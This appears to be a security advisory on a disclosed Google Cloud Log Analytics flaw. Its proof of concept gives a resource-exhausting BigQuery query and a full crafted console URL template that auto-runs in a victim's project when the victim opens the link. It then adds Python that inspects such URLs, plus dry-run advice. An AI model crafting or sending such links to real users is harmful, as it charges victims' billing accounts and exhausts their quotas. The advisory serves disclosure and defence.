Google Cloud Platform (GCP) Cloud Logging Cross-Tenant Denial of Wallet with Log Analytics

Tenable Research has identified and responsibly disclosed a Denial of Wallet (DoW) vulnerability in Google Cloud Logging’s Log Analytics. It allowed an attacker to make a victim’s project execute large, expensive BigQuery queries simply by getting a user of that project to open a maliciously crafted Cloud Logging URL.

When a user opens a Log Analytics URL, the SQL query embedded in it is submitted automatically; the URL’s own parameters select the SQL query language and, with useReservedSlots=true, BigQuery reserved-slot execution. An attacker can craft a URL carrying a resource-exhaustion query: several CROSS JOIN clauses against very large public datasets (for example, tables in bigquery-public-data) make the query process terabytes of data, and SELECT * ensures every column of every joined table is read. The attacker needs no access to the victim’s project: the BigQuery jobs are started in the victim’s project under the victim’s own console session, so the processing cost lands on the victim’s billing account. A victim who simply follows the link may incur significant charges or exhaust the project’s query quota.

Proof of Concept:

  1. Create a malicious query that will process a massive amount of data:

     SELECT *
       FROM
         `[VICTIM_PROJECT].global._Default._AllLogs`
         CROSS JOIN `bigquery-public-data.[PUBLIC_DATASET].[PUBLIC_TABLE]`
         CROSS JOIN `bigquery-public-data.[PUBLIC_DATASET2].[PUBLIC_TABLE2]`
         -- Add more CROSS JOINs to process more data and incur more cost

  2. Craft a Log Analytics URL that will run the query in the victim’s project. [MALICIOUS_QUERY] is the query above, percent-encoded; note that it appears twice, once in the queryHandle matrix parameter and once in the chartConfig query parameter:

https://console.cloud.google.com/logs/analytics;queriedResources=%7B%22resources%22:%5B%22projects%2F[VICTIM_PROJECT]%2Flocations%2Fglobal%2Fbuckets%2F_Default%2Fviews%2F_AllLogs%22%5D%7D;queryHandle=%7B%22query%22:%22[MALICIOUS_QUERY]%22%7D;upperTab=query;lowerTab=query_results;queryLanguage=SQL;useReservedSlots=true?project=[VICTIM_PROJECT]&chartConfig=%7B%22xyChart%22:%7B%22constantLines%22:%5B%5D,%22dataSets%22:%5B%7B%22breakdowns%22:%5B%5D,%22dimensions%22:%5B%7B%22column%22:%22%22,%22columnType%22:%22%22,%22sortColumn%22:%22%22,%22sortOrder%22:%22SORT_ORDER_ASCENDING%22%7D%5D,%22measures%22:%5B%7B%22aggregationFunction%22:%7B%22parameters%22:%5B%5D,%22type%22:%22count%22%7D,%22column%22:%22%22%7D%5D,%22opsAnalyticsQuery%22:%7B%22queryExecutionRules%22:%7B%22useReservedSlots%22:true%7D,%22queryHandle%22:%22%22,%22sql%22:%22[MALICIOUS_QUERY]%22%7D,%22plotType%22:%22STACKED_BAR%22,%22pointConnectionMethod%22:%22GAP_DETECTION%22,%22sortOrderParameters%22:%5B%5D,%22targetAxis%22:%22Y1%22%7D%5D,%22options%22:%7B%22mode%22:%22COLOR%22%7D,%22y1Axis%22:%7B%22label%22:%22%22,%22scale%22:%22LINEAR%22%7D%7D%7D

  3. Get the victim to browse to the malicious URL; the console submits the query automatically on page load.
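The following Python is an added example, not code from Tenable’s advisory or from Google. It decodes a Log Analytics console URL of the shape shown in step 2, extracts the SQL the console would auto-run, and reports which project pays and how amplified the query is (CROSS JOIN count, tables owned by projects other than the billing project, reserved-slot execution). The project name `victim-proj`, the public dataset and table names, and the `build_log_analytics_url` helper that assembles the sample URLs are assumptions for the example; the builder mirrors the parameter layout of the PoC URL but trims the chartConfig JSON to the fields the inspector reads.

```python
import json
import re
from urllib.parse import parse_qs, quote, unquote, urlencode, urlsplit

CONSOLE_BASE = "https://console.cloud.google.com/logs/analytics"

# Constructed sample inputs (hypothetical project, datasets and tables).
VICTIM_PROJECT = "victim-proj"
MALICIOUS_SQL = (
    "SELECT * FROM `victim-proj.global._Default._AllLogs` "
    "CROSS JOIN `bigquery-public-data.wikipedia.pageviews_2023` "
    "CROSS JOIN `bigquery-public-data.github_repos.contents`"
)
BENIGN_SQL = "SELECT timestamp, severity FROM `victim-proj.global._Default._AllLogs` LIMIT 10"


def build_log_analytics_url(project, sql, reserved_slots=True):
    """Assemble a URL with the parameter layout of the advisory's PoC link.

    Used only to create fixtures here; the JSON bodies are trimmed to the
    fields the inspector below reads."""
    view = f"projects/{project}/locations/global/buckets/_Default/views/_AllLogs"

    def enc(obj):  # matrix-parameter values are percent-encoded JSON
        return quote(json.dumps(obj, separators=(",", ":")), safe="")

    matrix = [
        "queriedResources=" + enc({"resources": [view]}),
        "queryHandle=" + enc({"query": sql}),
        "upperTab=query",
        "lowerTab=query_results",
        "queryLanguage=SQL",
        "useReservedSlots=" + ("true" if reserved_slots else "false"),
    ]
    chart = {"xyChart": {"dataSets": [{"opsAnalyticsQuery": {
        "queryExecutionRules": {"useReservedSlots": reserved_slots},
        "sql": sql,
    }}]}}
    query = urlencode({"project": project,
                       "chartConfig": json.dumps(chart, separators=(",", ":"))})
    return CONSOLE_BASE + ";" + ";".join(matrix) + "?" + query


def _matrix_params(path):
    """Decode the ';key=value' matrix parameters that follow /logs/analytics."""
    params = {}
    for segment in path.split(";")[1:]:
        key, _, value = segment.partition("=")
        params[key] = unquote(value)
    return params


def _load_json(text):
    try:
        return json.loads(text) if text else {}
    except json.JSONDecodeError:
        return {}


def inspect_log_analytics_url(url):
    """Return what the console would auto-run and which project would pay."""
    parts = urlsplit(url)
    matrix = _matrix_params(parts.path)
    qs = parse_qs(parts.query)
    # Jobs are started in the project named here, so its billing account pays.
    billing_project = qs.get("project", [""])[0]

    # The SQL is carried twice: in queryHandle and inside chartConfig.
    handle_sql = _load_json(matrix.get("queryHandle", "")).get("query", "")
    chart = _load_json(qs.get("chartConfig", [""])[0])
    chart_sqls = [ds.get("opsAnalyticsQuery", {}).get("sql", "")
                  for ds in chart.get("xyChart", {}).get("dataSets", [])]
    sql = handle_sql or next((s for s in chart_sqls if s), "")

    # Every backticked table reference starts with the project that owns it.
    ref_projects = sorted({ref.split(".")[0] for ref in re.findall(r"`([^`]+)`", sql)})
    foreign_projects = [p for p in ref_projects if p != billing_project]
    cross_joins = len(re.findall(r"\bCROSS\s+JOIN\b", sql, flags=re.IGNORECASE))

    auto_run = bool(sql) and matrix.get("queryLanguage", "").upper() == "SQL"
    reserved = matrix.get("useReservedSlots", "").lower() == "true"

    if auto_run and cross_joins and foreign_projects:
        risk = "high"      # auto-run joins against tables the payer does not own
    elif auto_run and (cross_joins or foreign_projects):
        risk = "medium"
    else:
        risk = "low"

    return {
        "billing_project": billing_project,
        "sql": sql,
        "auto_run": auto_run,
        "use_reserved_slots": reserved,
        "cross_join_count": cross_joins,
        "foreign_projects": foreign_projects,
        "risk": risk,
    }


if __name__ == "__main__":
    for label, q in (("malicious", MALICIOUS_SQL), ("benign", BENIGN_SQL)):
        print(label, inspect_log_analytics_url(build_log_analytics_url(VICTIM_PROJECT, q)))
```

Static inspection is a first filter, not a cost estimate. To see what a shared link would actually cost before anyone in the project clicks it, take the extracted SQL and run it through `bq query --dry_run --use_legacy_sql=false`: a dry run reports the bytes the query would process without starting a billable job. Any Log Analytics link that joins against projects you do not own, or that sets useReservedSlots=true, deserves that check before it is opened.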

Ben Smith